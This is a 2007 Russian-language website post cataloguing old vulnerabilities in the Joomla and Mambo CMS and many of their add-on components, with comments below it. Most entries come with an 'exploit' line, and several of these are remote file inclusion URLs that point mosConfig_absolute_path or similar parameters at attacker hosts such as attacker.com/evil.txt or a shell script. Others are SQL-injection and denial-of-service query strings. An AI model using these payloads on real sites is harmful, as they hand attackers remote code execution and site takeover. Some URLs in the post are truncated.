Новости сайта
Главная страница » 2007 » Апрель » 20 » Joomla & Mambo BUG

Joomla & Mambo BUG



Обзор уязвимостей популярной CMS Joomla ( Mambo )







URL производителя Mambo CMS :
www.mamboserver.com


URL производителя Joomla CMS :
www.joomla.org




Что почитать :
http://ru-mambo.ru/index.php?option=...egory&id= 123

http://joom.ru/

http://myjoomla.ru




JOOMLA & MAMBO





Joomla : < 1.0.4

Недостаточно фильтруются данные в параметре "Itemid" в модуле "mod_poll" и в других методах в классе "mosDBTable".



Joomla : 1.0.5

Уязвимость существует из-за того, что программное обеспечение позволяет злоумышленнику получить доступ к vCard других пользователей с помощью специально сформированного URL.



Joomla : 1.0.10 ; 4.5.4 и 4.6 RC2 ( Mambo )

Уязвимость существует из-за недостаточной фильтрации входящего параметра "id" и позволяет выполнять произвольный SQL запросы.

Примечание : Для удачной эксплуатации уязвимости злоумышленник должен иметь привилегии редактора.



Joomla : 1.0.7

Уязвимость существует при обработке входных данных в сценарии includes/feedcreator.class.php.

Эксплоит : index.php?option=com_rss&feed=filename_here&no_htm l=1

Уязвимость существует при обработке входных данных в сценарии includes/phpInputFilter/class.inputfilter.php.

Эксплоит :index.php?option=com_poll&task=results&id=14&mosm sg=DOS@HERE<<>AAA<><>



Joomla : 1.0.9

Уязвимость существует из-за недостаточной обработки входных данных в параметре "Name".



Mambo : 3.0

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_mambatstaff/mambatstaff.php

Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена



Mambo : 4.5.2.3

Уязвимость существует из-за ошибки в уровне эмуляции "register_globals" в сценарии "globals.php".

Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена



УЯЗВИМОСТИ В МОДАХ-НАДСТРОЙКАХ ДЛЯ JOOMLA CMS



Community Builder 1.0 RC 2 и 1.0

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_comprofiler/plugin.class.php

Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена



JIM : 1.0.1

Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'install.jim.php'

Эксплоит :
http://victim/[path]/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://evil_script?


Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена



Coppermine 1.0

Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'cpg.php'

Эксплоит :
http://victim/components/com_cpg/cpg...absolute_path=


Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена



Webring 1.0

Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'admin.webring.docs.php'

Эксплоит :
http://victim/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?


Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена



JD-Wiki < 1.0.3

Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'main.php'

Эксплоит : /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell

Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена



Security Images 3.0.5

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path"

Эксплоит :
http://victim/components/com_securit...tp://shell.txt


Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена



Colophon 1.2

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_colophon/admin.colophon.php.

Эксплоит :htttp:/victim/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?

Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена



Mambo-SMF Forum 1.3.1.3

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_smf/smf.php.

Эксплоит :
http://[site]/[joomla or mambo path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[evil scripts]


Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена



PollXT 1.22.07

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_pollxt/conf.pollxt.php.

Эксплоит :
http://victim/components/com_pollxt/...ttp://evilhost


Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена



perForms 1.0

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии performs.php.

Эксплоит :
http://www.vuln.com/components/com_p...ttp://evilhost


Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена



com_hashcash 1.2.1

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_hashcash/server.php.

Эксплоит :
http://[target]/[path]/components/com_hashcash/server.php? mosConfig_absolute_path=http://attacker.com/evil.txt?


Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена



PccookBook 1.3.1

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_pccookbook/pccookbook.php.

Эксплоит :
http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://attacker.com/evil.txt?


Просмотров: 3746 | Добавил: dozzer | Рейтинг: 3.0 |
Комментарии
Всего комментариев: 3
3 Johng318  
0
Do you have a spam problem on this site I also am kedegfdbdkag

2 dozzer  
0
хм, тут ясно написана версия, обновление будет.

1 alter  
0
Версии указанные выше - сильно пахнут нафталином...
Запоздал обзорчик.. А люди поверить могут... ;)

Имя *:
Email *:
Код *: